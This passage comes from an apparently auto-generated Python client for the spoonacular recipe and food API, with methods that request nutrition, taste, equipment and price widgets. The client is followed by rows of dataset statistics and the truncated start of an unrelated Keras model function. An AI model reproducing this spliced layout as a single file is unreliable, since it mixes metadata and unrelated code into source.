    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_product_nutrition_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_product_nutrition_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Product Nutrition by ID  # noqa: E501
    Visualize a product's nutritional information as HTML including CSS.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_product_nutrition_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param float id: The id of the product. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['id', 'default_css']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_product_nutrition_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_product_nutrition_by_id`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    # 'id' fills the {id} placeholder in the request path; 'default_css'
    # is sent as the camelCase query parameter defaultCss.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/food/products/{id}/nutritionWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_equipment_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Equipment by ID  # noqa: E501

    Visualize a recipe's equipment list.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_recipe_equipment_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_recipe_equipment_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_recipe_equipment_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Equipment by ID  # noqa: E501
    Visualize a recipe's equipment list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.visualize_recipe_equipment_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # Snapshot the named arguments. NOTE: locals() also captures 'self'
    # and the raw 'kwargs' dict; validated kwargs are merged in below and
    # the raw dict is then removed.
    local_var_params = locals()
    all_params = ['id', 'default_css']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Reject any keyword argument that is not declared for this endpoint.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_equipment_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_equipment_by_id`")  # noqa: E501
    # No parameter of this endpoint uses a collection format.
    collection_formats = {}
    # 'id' fills the {id} placeholder in the request path; 'default_css'
    # is sent as the camelCase query parameter defaultCss.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501
    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501
    # Delegate the actual HTTP request to the shared API client.
    return self.api_client.call_api(
        '/recipes/{id}/equipmentWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_ingredients_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Ingredients by ID  # noqa: E501

    Visualize a recipe's ingredient list.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response data.

    >>> thread = api.visualize_recipe_ingredients_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str (or the request thread when called asynchronously)
    """
    # Convenience wrapper: callers want just the payload, never the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The delegate already returns the request thread for async calls
    # and the plain data otherwise, so its result is passed straight back.
    return self.visualize_recipe_ingredients_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_recipe_ingredients_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Ingredients by ID  # noqa: E501

    Visualize a recipe's ingredient list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_ingredients_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals ('self', 'id', 'kwargs'); accepted
    # kwargs are merged into the snapshot below so all parameters can be
    # looked up in a single dict.
    local_var_params = locals()

    all_params = ['id', 'default_css']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_ingredients_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_ingredients_by_id`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} path template below.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/{id}/ingredientWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_nutrition(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Recipe Nutrition  # noqa: E501

    Visualize a recipe's nutritional information as HTML including CSS. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_nutrition(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the payload; callers wanting
    # status/headers use the _with_http_info variant directly.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield the data, async calls yield the request thread --
    # either way the _with_http_info result is handed back unchanged.
    return self.visualize_recipe_nutrition_with_http_info(ingredient_list, servings, **kwargs)  # noqa: E501
def visualize_recipe_nutrition_with_http_info(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Visualize Recipe Nutrition  # noqa: E501

    Visualize a recipe's nutritional information as HTML including CSS. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_nutrition_with_http_info(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals; accepted kwargs are merged into the
    # snapshot below so all parameters can be looked up in a single dict.
    local_var_params = locals()

    all_params = ['ingredient_list', 'servings', 'default_css', 'show_backlink']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_nutrition" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'ingredient_list' is set
    if ('ingredient_list' not in local_var_params or
            local_var_params['ingredient_list'] is None):
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_recipe_nutrition`")  # noqa: E501
    # verify the required parameter 'servings' is set
    if ('servings' not in local_var_params or
            local_var_params['servings'] is None):
        raise ApiValueError("Missing the required parameter `servings` when calling `visualize_recipe_nutrition`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    # All inputs travel as form fields (form-encoded POST, see the
    # Content-Type header below), not as query parameters.
    form_params = []
    local_var_files = {}
    if 'ingredient_list' in local_var_params:
        form_params.append(('ingredientList', local_var_params['ingredient_list']))  # noqa: E501
    if 'servings' in local_var_params:
        form_params.append(('servings', local_var_params['servings']))  # noqa: E501
    if 'default_css' in local_var_params:
        form_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501
    if 'show_backlink' in local_var_params:
        form_params.append(('showBacklink', local_var_params['show_backlink']))  # noqa: E501

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/visualizeNutrition', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_nutrition_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Nutrition by ID  # noqa: E501

    Visualize a recipe's nutritional information as HTML including CSS.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_nutrition_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the payload; callers wanting
    # status/headers use the _with_http_info variant directly.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield the data, async calls yield the request thread --
    # either way the _with_http_info result is handed back unchanged.
    return self.visualize_recipe_nutrition_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_recipe_nutrition_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Nutrition by ID  # noqa: E501

    Visualize a recipe's nutritional information as HTML including CSS.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_nutrition_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals ('self', 'id', 'kwargs'); accepted
    # kwargs are merged into the snapshot below so all parameters can be
    # looked up in a single dict.
    local_var_params = locals()

    all_params = ['id', 'default_css']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_nutrition_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_nutrition_by_id`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} path template below.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/{id}/nutritionWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_price_breakdown_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Price Breakdown by ID  # noqa: E501

    Visualize a recipe's price breakdown.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_price_breakdown_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the payload; callers wanting
    # status/headers use the _with_http_info variant directly.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield the data, async calls yield the request thread --
    # either way the _with_http_info result is handed back unchanged.
    return self.visualize_recipe_price_breakdown_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_recipe_price_breakdown_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Price Breakdown by ID  # noqa: E501

    Visualize a recipe's price breakdown.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_price_breakdown_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool default_css: Whether the default CSS should be added to the response.
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals ('self', 'id', 'kwargs'); accepted
    # kwargs are merged into the snapshot below so all parameters can be
    # looked up in a single dict.
    local_var_params = locals()

    all_params = ['id', 'default_css']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_price_breakdown_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_price_breakdown_by_id`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} path template below.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []
    if 'default_css' in local_var_params:
        query_params.append(('defaultCss', local_var_params['default_css']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/{id}/priceBreakdownWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_taste(self, ingredient_list, **kwargs):  # noqa: E501
    """Visualize Recipe Taste  # noqa: E501

    Visualize a recipe's taste information as HTML including CSS. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_taste(ingredient_list, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the payload; callers wanting
    # status/headers use the _with_http_info variant directly.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield the data, async calls yield the request thread --
    # either way the _with_http_info result is handed back unchanged.
    return self.visualize_recipe_taste_with_http_info(ingredient_list, **kwargs)  # noqa: E501
def visualize_recipe_taste_with_http_info(self, ingredient_list, **kwargs):  # noqa: E501
    """Visualize Recipe Taste  # noqa: E501

    Visualize a recipe's taste information as HTML including CSS. You can play around with that endpoint!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_taste_with_http_info(ingredient_list, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals; accepted kwargs are merged into the
    # snapshot below so all parameters can be looked up in a single dict.
    local_var_params = locals()

    all_params = ['ingredient_list']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_taste" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'ingredient_list' is set
    if ('ingredient_list' not in local_var_params or
            local_var_params['ingredient_list'] is None):
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_recipe_taste`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    # The ingredient list travels as a form field (form-encoded POST, see
    # the Content-Type header below).
    form_params = []
    local_var_files = {}
    if 'ingredient_list' in local_var_params:
        form_params.append(('ingredientList', local_var_params['ingredient_list']))  # noqa: E501

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/visualizeTaste', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def visualize_recipe_taste_by_id(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Taste by ID  # noqa: E501

    Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_taste_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the payload; callers wanting
    # status/headers use the _with_http_info variant directly.
    kwargs['_return_http_data_only'] = True
    # Sync calls yield the data, async calls yield the request thread --
    # either way the _with_http_info result is handed back unchanged.
    return self.visualize_recipe_taste_by_id_with_http_info(id, **kwargs)  # noqa: E501
def visualize_recipe_taste_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Visualize Recipe Taste by ID  # noqa: E501

    Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.visualize_recipe_taste_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of this call's locals ('self', 'id', 'kwargs'); accepted
    # kwargs are merged into the snapshot below so all parameters can be
    # looked up in a single dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    # Client-level options accepted by every endpoint method.
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments; merge the recognized ones.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method visualize_recipe_taste_by_id" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_taste_by_id`")  # noqa: E501

    collection_formats = {}

    # 'id' is substituted into the {id} path template below.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept` -- this widget endpoint returns rendered HTML.
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/html'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/{id}/tasteWidget', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 48.680357
| 1,558
| 0.645488
| 55,725
| 446,837
| 4.922566
| 0.01624
| 0.052758
| 0.084109
| 0.029397
| 0.979953
| 0.974237
| 0.971135
| 0.964886
| 0.957825
| 0.94901
| 0
| 0.016897
| 0.270213
| 446,837
| 9,178
| 1,559
| 48.685661
| 0.824297
| 0.384433
| 0
| 0.819563
| 0
| 0
| 0.200527
| 0.043827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032604
| false
| 0
| 0.001013
| 0
| 0.082422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
402ae7b9d23540c4df39e1edae05bc76b92dd4bf
| 41
|
py
|
Python
|
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
src/universal_api/__init__.py
|
VolodymyrVozniak/universal-api
|
2566f55dc50d50f9833c4c6ef2617cc9378a2a9f
|
[
"MIT"
] | null | null | null |
from universal_api.universal_api import *
| 41
| 41
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4088fac56d395800a7a7b45c16abcab993a6746c
| 3,469
|
py
|
Python
|
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
airl/policy/estimators.py
|
malkayo/AiRL
|
7db8c6c7fa8c93783a18d7180c3e24fb6792c10a
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
def get_std_nn(policy, optim, w_init="zero", regularization=1E-3):
    # Return an std_nn Keras model
    #
    # Build a fully-connected estimator with one output unit per action.
    #   policy: provides `state_dimension` (input width) and `valid_actions`
    #           (output width).
    #   optim: Keras optimizer passed to model.compile.
    #   w_init: weight-initializer name (legacy Keras `init=` argument).
    #   regularization: L2 penalty applied to each Dense layer's weights.
    # Returns a tuple (compiled model, input_shape).
    #
    # NOTE(review): this uses the Keras 1.x API (`init=`, `W_regularizer=`)
    # and will not run unchanged on Keras 2+ -- confirm the pinned version.
    from keras.models import Sequential
    from keras.layers import Dense
    from keras.regularizers import l2
    from keras.layers.advanced_activations import LeakyReLU

    input_shape = (policy.state_dimension,)

    # Model Definition: three 128-unit hidden layers. Each Dense layer is
